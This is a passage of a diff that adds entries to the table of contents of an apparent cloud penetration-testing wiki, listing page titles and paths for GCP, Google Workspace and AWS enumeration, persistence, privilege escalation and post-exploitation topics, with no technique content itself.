+    * [GCP - Network Docker Escape](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md)
+    * [GCP - local privilege escalation ssh pivoting](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md)
+  * [GCP - Persistence](pentesting-cloud/gcp-security/gcp-persistence/README.md)
+    * [GCP - API Keys Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md)
+    * [GCP - App Engine Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md)
+    * [GCP - Artifact Registry Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md)
+    * [GCP - BigQuery Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md)
+    * [GCP - Cloud Functions Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md)
+    * [GCP - Cloud Run Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md)
+    * [GCP - Cloud Shell Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md)
+    * [GCP - Cloud SQL Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md)
+    * [GCP - Compute Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md)
+    * [GCP - Dataflow Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md)
+    * [GCP - Filestore Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md)
+    * [GCP - Logging Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md)
+    * [GCP - Secret Manager Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md)
+    * [GCP - Storage Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md)
+    * [GCP - Token Persistance](pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md)
+  * [GCP - Services](pentesting-cloud/gcp-security/gcp-services/README.md)
+    * [GCP - AI Platform Enum](pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md)
+    * [GCP - API Keys Enum](pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md)
+    * [GCP - App Engine Enum](pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md)
+    * [GCP - Artifact Registry Enum](pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.md)
+    * [GCP - Batch Enum](pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md)
+    * [GCP - Bigquery Enum](pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md)
+    * [GCP - Bigtable Enum](pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md)
+    * [GCP - Cloud Build Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md)
+    * [GCP - Cloud Functions Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md)
+    * [GCP - Cloud Run Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md)
+    * [GCP - Cloud Shell Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md)
+    * [GCP - Cloud SQL Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md)
+    * [GCP - Cloud Scheduler Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md)
+    * [GCP - Compute Enum](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md)
+      * [GCP - Compute Instances](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md)
+      * [GCP - VPC & Networking](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md)
+    * [GCP - Composer Enum](pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md)
+    * [GCP - Containers & GKE Enum](pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md)
+    * [GCP - DNS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md)
+    * [GCP - Filestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md)
+    * [GCP - Firebase Enum](pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md)
+    * [GCP - Firestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md)
+    * [GCP - IAM, Principals & Org Policies Enum](pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md)
+    * [GCP - KMS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md)
+    * [GCP - Logging Enum](pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.md)
+    * [GCP - Memorystore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md)
+    * [GCP - Monitoring Enum](pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md)
+    * [GCP - Pub/Sub Enum](pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md)
+    * [GCP - Secrets Manager Enum](pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md)
+    * [GCP - Security Enum](pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.md)
+    * [GCP - Source Repositories Enum](pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md)
+    * [GCP - Spanner Enum](pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md)
+    * [GCP - Stackdriver Enum](pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md)
+    * [GCP - Storage Enum](pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md)
+    * [GCP - Workflows Enum](pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md)
+  * [GCP <--> Workspace Pivoting](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md)
+    * [GCP - Understanding Domain-Wide Delegation](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md)
+  * [GCP - Unauthenticated Enum & Access](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md)
+    * [GCP - API Keys Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md)
+    * [GCP - App Engine Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md)
+    * [GCP - Artifact Registry Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md)
+    * [GCP - Cloud Build Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md)
+    * [GCP - Cloud Functions Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md)
+    * [GCP - Cloud Run Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md)
+    * [GCP - Cloud SQL Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md)
+    * [GCP - Compute Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md)
+    * [GCP - IAM, Principals & Org Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md)
+    * [GCP - Source Repositories Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md)
+    * [GCP - Storage Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md)
+      * [GCP - Public Buckets Privilege Escalation](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md)
+* [GWS - Workspace Pentesting](pentesting-cloud/workspace-security/README.md)
+  * [GWS - Post Exploitation](pentesting-cloud/workspace-security/gws-post-exploitation.md)
+  * [GWS - Persistence](pentesting-cloud/workspace-security/gws-persistence.md)
+  * [GWS - Workspace Sync Attacks (GCPW, GCDS, GPS, Directory Sync with AD & EntraID)](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md)
+    * [GWS - Admin Directory Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md)
+    * [GCDS - Google Cloud Directory Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md)
+    * [GCPW - Google Credential Provider for Windows](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md)
+    * [GPS - Google Password Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md)
+  * [GWS - Google Platforms Phishing](pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md)
+    * [GWS - App Scripts](pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md)
+* [AWS Pentesting](pentesting-cloud/aws-security/README.md)
+  * [AWS - Basic Information](pentesting-cloud/aws-security/aws-basic-information/README.md)
+    * [AWS - Federation Abuse](pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md)
+  * [AWS - Permissions for a Pentest](pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md)
+  * [AWS - Persistence](pentesting-cloud/aws-security/aws-persistence/README.md)
+    * [AWS - API Gateway Persistence](pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md)
+    * [AWS - Cognito Persistence](pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md)
+    * [AWS - DynamoDB Persistence](pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md)
+    * [AWS - EC2 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md)
+    * [AWS - ECR Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md)
+    * [AWS - ECS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md)
+    * [AWS - Elastic Beanstalk Persistence](pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md)
+    * [AWS - EFS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md)
+    * [AWS - IAM Persistence](pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md)
+    * [AWS - KMS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md)
+    * [AWS - Lambda Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md)
+      * [AWS - Abusing Lambda Extensions](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md)
+      * [AWS - Lambda Layers Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md)
+    * [AWS - Lightsail Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md)
+    * [AWS - RDS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md)
+    * [AWS - S3 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md)
+    * [AWS - SNS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md)
+    * [AWS - Secrets Manager Persistence](pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md)
+    * [AWS - SQS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md)
+    * [AWS - SSM Perssitence](pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md)
+    * [AWS - Step Functions Persistence](pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md)
+    * [AWS - STS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md)
+  * [AWS - Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/README.md)
+    * [AWS - API Gateway Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md)
+    * [AWS - CloudFront Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md)
+    * [AWS - CodeBuild Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md)
+      * [AWS Codebuild - Token Leakage](pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md)
+    * [AWS - Control Tower Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md)
+    * [AWS - DLM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md)
+    * [AWS - DynamoDB Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md)
+    * [AWS - EC2, EBS, SSM & VPC Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md)
+      * [AWS - EBS Snapshot Dump](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md)
+      * [AWS - Malicious VPC Mirror](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md)
+    * [AWS - ECR Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md)
+    * [AWS - ECS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md)
+    * [AWS - EFS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md)
+    * [AWS - EKS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md)
+    * [AWS - Elastic Beanstalk Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md)
+    * [AWS - IAM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md)
+    * [AWS - KMS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md)
+    * [AWS - Lambda Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md)
+      * [AWS - Steal Lambda Requests](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md)
+    * [AWS - Lightsail Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md)
+    * [AWS - Organizations Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md)
+    * [AWS - RDS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md)
+    * [AWS - S3 Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md)
+    * [AWS - Secrets Manager Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md)
+    * [AWS - SES Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md)
+    * [AWS - SNS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md)
+    * [AWS - SQS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md)
+    * [AWS - SSO & identitystore Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md)
+    * [AWS - Step Functions Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md)
+    * [AWS - STS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md)
+    * [AWS - VPN Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md)
+  * [AWS - Privilege Escalation](pentesting-cloud/aws-security/aws-privilege-escalation/README.md)
+    * [AWS - Apigateway Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md)
+    * [AWS - Chime Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md)
+    * [AWS - Codebuild Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md)
+    * [AWS - Codepipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md)
+    * [AWS - Codestar Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md)
+      * [codestar:CreateProject, codestar:AssociateTeamMember](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md)
+      * [iam:PassRole, codestar:CreateProject](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md)
+    * [AWS - Cloudformation Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md)
+      * [iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md)
+    * [AWS - Cognito Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md)
+    * [AWS - Datapipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md)
+    * [AWS - Directory Services Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md)
+    * [AWS - DynamoDB Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md)
+    * [AWS - EBS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md)
+    * [AWS - EC2 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md)
+    * [AWS - ECR Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md)
+    * [AWS - ECS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md)
+    * [AWS - EFS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md)
+    * [AWS - Elastic Beanstalk Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md)
+    * [AWS - EMR Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md)
+    * [AWS - EventBridge Scheduler Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md)
+    * [AWS - Gamelift](pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md)
+    * [AWS - Glue Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md)
+    * [AWS - IAM Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md)
+    * [AWS - KMS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md)
+    * [AWS - Lambda Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md)
+    * [AWS - Lightsail Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md)
+    * [AWS - Mediapackage Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md)
+    * [AWS - MQ Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md)
+    * [AWS - MSK Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md)
+    * [AWS - RDS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md)
+    * [AWS - Redshift Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md)
+    * [AWS - Route53 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md)
+    * [AWS - SNS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md)
+    * [AWS - SQS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md)
+    * [AWS - SSO & identitystore Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md)
+    * [AWS - Organizations Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md)
+    * [AWS - S3 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md)
+    * [AWS - Sagemaker Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md)
+    * [AWS - Secrets Manager Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md)
+    * [AWS - SSM Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md)
+    * [AWS - Step Functions Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md)
+    * [AWS - STS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md)
+    * [AWS - WorkDocs Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md)
+  * [AWS - Services](pentesting-cloud/aws-security/aws-services/README.md)
+    * [AWS - Security & Detection Services](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md)
+      * [AWS - CloudTrail Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md)
+      * [AWS - CloudWatch Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md)
+      * [AWS - Config Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md)
+      * [AWS - Control Tower Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md)
+      * [AWS - Cost Explorer Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md)
+      * [AWS - Detective Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md)
+      * [AWS - Firewall Manager Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md)
+      * [AWS - GuardDuty Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md)
+      * [AWS - Inspector Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md)
+      * [AWS - Macie Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md)
+      * [AWS - Security Hub Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md)
+      * [AWS - Shield Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md)
+      * [AWS - Trusted Advisor Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md)
+      * [AWS - WAF Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md)
+    * [AWS - API Gateway Enum](pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md)
+    * [AWS - Certificate Manager (ACM) & Private Certificate Authority (PCA)](pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md)
+    * [AWS - CloudFormation & Codestar Enum](pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md)
+    * [AWS - CloudHSM Enum](pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md)
+    * [AWS - CloudFront Enum](pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md)
+    * [AWS - Codebuild Enum](pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md)
+    * [AWS - Cognito Enum](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md)
+      * [Cognito Identity Pools](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md)
+      * [Cognito User Pools](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md)
+    * [AWS - DataPipeline, CodePipeline & CodeCommit Enum](pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md)
+    * [AWS - Directory Services / WorkDocs Enum](pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md)
+    * [AWS - DocumentDB Enum](pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md)
+    * [AWS - DynamoDB Enum](pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md)
+    * [AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md)
+      * [AWS - Nitro Enum](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md)
+      * [AWS - VPC & Networking Basic Information](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md)
+    * [AWS - ECR Enum](pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md)
+    * [AWS - ECS Enum](pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md)
+    * [AWS - EKS Enum](pentesting-cloud/aws-security/aws-services/aws-eks-enum.md)
+    * [AWS - Elastic Beanstalk Enum](pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md)
+    * [AWS - ElastiCache](pentesting-cloud/aws-security/aws-services/aws-elasticache.md)
+    * [AWS - EMR Enum](pentesting-cloud/aws-security/aws-services/aws-emr-enum.md)
+    * [AWS - EFS Enum](pentesting-cloud/aws-security/aws-services/aws-efs-enum.md)
+    * [AWS - EventBridge Scheduler Enum](pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md)
+    * [AWS - Kinesis Data Firehose Enum](pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md)
+    * [AWS - IAM, Identity Center & SSO Enum](pentesting-cloud/aws-security/aws-services/aws-iam-enum.md)
+    * [AWS - KMS Enum](pentesting-cloud/aws-security/aws-services/aws-kms-enum.md)
+    * [AWS - Lambda Enum](pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md)
+    * [AWS - Lightsail Enum](pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md)
+    * [AWS - MQ Enum](pentesting-cloud/aws-security/aws-services/aws-mq-enum.md)
+    * [AWS - MSK Enum](pentesting-cloud/aws-security/aws-services/aws-msk-enum.md)
+    * [AWS - Organizations Enum](pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md)
+    * [AWS - Redshift Enum](pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md)
+    * [AWS - Relational Database (RDS) Enum](pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md)
+    * [AWS - Route53 Enum](pentesting-cloud/aws-security/aws-services/aws-route53-enum.md)
+    * [AWS - Secrets Manager Enum](pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md)
+    * [AWS - SES Enum](pentesting-cloud/aws-security/aws-services/aws-ses-enum.md)
+    * [AWS - SNS Enum](pentesting-cloud/aws-security/aws-services/aws-sns-enum.md)
+    * [AWS - SQS Enum](pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md)
+    * [AWS - S3, Athena & Glacier Enum](pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md)
+    * [AWS - Step Functions Enum](pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md)
+    * [AWS - STS Enum](pentesting-cloud/aws-security/aws-services/aws-sts-enum.md)
+    * [AWS - Other Services Enum](pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md)
+  * [AWS - Unauthenticated Enum & Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md)
+    * [AWS - Accounts Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md)
+    * [AWS - API Gateway Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md)
+    * [AWS - Cloudfront Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md)
+    * [AWS - Cognito Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md)
+    * [AWS - CodeBuild Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md)
+    * [AWS - DocumentDB Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md)
+    * [AWS - DynamoDB Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md)
+    * [AWS - EC2 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md)
